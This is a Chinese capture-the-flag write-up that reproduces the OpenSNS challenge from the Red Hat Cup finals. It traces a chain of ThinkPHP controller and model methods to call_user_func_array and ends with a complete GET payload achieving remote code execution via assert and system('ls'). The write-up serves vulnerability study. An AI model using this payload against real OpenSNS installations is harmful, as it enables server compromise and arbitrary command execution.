前言
因为某些事情,没有参加今年的红帽杯决赛,所以来复现一下决赛的Web题里面的opensns,学习一下思路。
复现
根据网上的文章进行复现学习。感觉能找到这个洞的师傅实在tql。
漏洞点位于Application/Weibo/Controller/ShareController.class.php的shareBox方法:
public function shareBox(){
$query = urldecode(I('get.query','','text'));
parse_str($query,$array);
$this->assign('query',$query);
$this->assign('parse_array',$array);
$this->display(T('Weibo@default/Widget/share/sharebox'));
}
看了这个才隐约想到,之前自己了解tp的时候,了解到模板文件里也是可以执行代码的。之前一直都没考虑过这个。
这里就用到了。先把get传的query参数进行url解码,然后将这个字符串解析成变量数组,然后进行模板渲染。
跟进这个模板看一下:
<div id="frm-post-popup" class="white-popup" style="max-width: 745px">
<div class="weibo_post_box">
<h2>{:L('_SHARE_TO_WEIBO_')}</h2>
<div class="aline" style="margin-bottom: 10px"></div>
<div class="row">
<div class="col-xs-12">
<div>
{:W('Weibo/Share/fetchShare',array('param'=>$parse_array))}
</div>
<br/>
<p>
<textarea class="form-control" id="share_content" style="height: 6em;"
placeholder="{:L('_PLACE_HOLDER_WRITE_SOMETHING_')}{:L('_WAVE_')}{:L('_WAVE_')}">{$weiboContent}</textarea></p>
<a href="javascript:" onclick="insertFace($(this))"><img src="__CORE_IMAGE__/bq.png"/></a>
<p class="pull-right"><input type="submit" value="{:L('_PUBLISH_CTRL_CENTER_')}" data-role="do_send_share" data-query="{$query}"
class="btn btn-primary" data-url="{:U('weibo/Share/doSendShare')}"/></p>
</div>
</div>
<div id="emot_content" class="emot_content"></div>
<button title="Close (Esc)" type="button" class="mfp-close" style="color: #333;">×</button>
</div>
</div>
<script>
$(function () {
$('#share_content').keypress(function (e) {
if (e.ctrlKey && e.which == 13 || e.which == 10) {
$("[data-role='do_send_share']").click();
}
});
$('[data-role="do_send_share"]').click(function(){
var url = $(this).attr('data-url');
var content = $('#share_content').val();
var $button = $(this);
var query = $button.attr('data-query');
var originalButtonText = $button.val();
$.post(url, {content: content,query:query}, function (a) {
handleAjax(a);
if (a.status) {
$('.mfp-close').click();
$button.attr('class', 'btn btn-primary');
$button.val(originalButtonText);
}
});
})
});
</script>
可以发现:
<div>
{:W('Weibo/Share/fetchShare',array('param'=>$parse_array))}
</div>
调用W方法,细看的话就是W方法里面又调用了R方法。thinkphp的注释中写道,W方法是用来渲染输出Widget,R方法是远程调用控制器的操作方法 URL 参数格式 [资源://][模块/]控制器/操作。
可以不具体的了解代码,简单来说,这个模板代码的作用就是,调用Weibo application下的Share Model下的fetchShare方法,而传入的第一个参数就是array('param'=>$parse_array):
public function fetchShare($param, $weibo = null)
{
$this->assginFetch($param, $weibo = null);
$this->display(T('Weibo@default/Widget/share/fetchshare'));
}
继续跟进assginFetch方法看看:
private function assginFetch($param, $weibo = null)
{
if ($weibo) {
$this->assign('weibo', $weibo);
}
$show = D('Weibo/Share')->getInfo($param);
$show=array_merge($show, $param);
$this->assign('show', $show);
}
看一下D方法的注释:实例化模型类 格式 [资源://][模块/]模型。
所以其实就是实例化Weibo模块下面的ShareModel类,调用它的getInfo方法:
public function getInfo($param)
{
$info = array();
if(!empty($param['app']) && !empty($param['model']) && !empty($param['method'])){
$info = D($param['app'].'/'.$param['model'])->$param['method']($param['id']);
}
return $info;
}
然后关键的来了:
$info = D($param['app'].'/'.$param['model'])->$param['method']($param['id']);
实例化某个模型类,然后调用这个类某个方法,第一个参数可控。
因此就是想办法找个可以rce的模型类方法了。发现的那个师傅找到的是_validationFieldItem方法,但是这个方法有两个参数,而且两个参数都会用到:
protected function _validationFieldItem($data, $val)
又恰巧找到了ScheduleModel.class.php下的runSchedule方法:
public function runSchedule($schedule)
{
if ($schedule['status'] == 1) {
$method = explode('->', $schedule['method']);
parse_str($schedule['args'], $args);
try {
$return = D($method[0])->$method[1]($args, $schedule);
}
构造status键值进入if,然后$args和$schedule都是可控的,所以参数可控。而且$method经过explode得到,也可控,因此可以调用_validationFieldItem方法:
protected function _validationFieldItem($data, $val)
{
switch (strtolower(trim($val[4]))) {
case 'function':
case 'callback':
$args = isset($val[6]) ? (array)$val[6] : array();
if (is_string($val[0]) && strpos($val[0], ','))
$val[0] = explode(',', $val[0]);
if (is_array($val[0])) {
foreach ($val[0] as $field)
$_data[$field] = $data[$field];
array_unshift($args, $_data);
} else {
array_unshift($args, $data[$val[0]]);
}
if ('function' == $val[4]) {
return call_user_func_array($val[1], $args);
} else {
return call_user_func_array(array(&$this, $val[1]), $args);
}
先判断$val[4],发现如果是function,并没有给break,还会进入到下面的case,是开发的问题。
然后有用的代码就是这些了:
$args = isset($val[6]) ? (array)$val[6] : array();
array_unshift($args, $data[$val[0]]);
return call_user_func_array($val[1], $args);
构造出payload即可:
?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule->_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system('ls');
参考文章
某CMS代码执行漏洞分析
|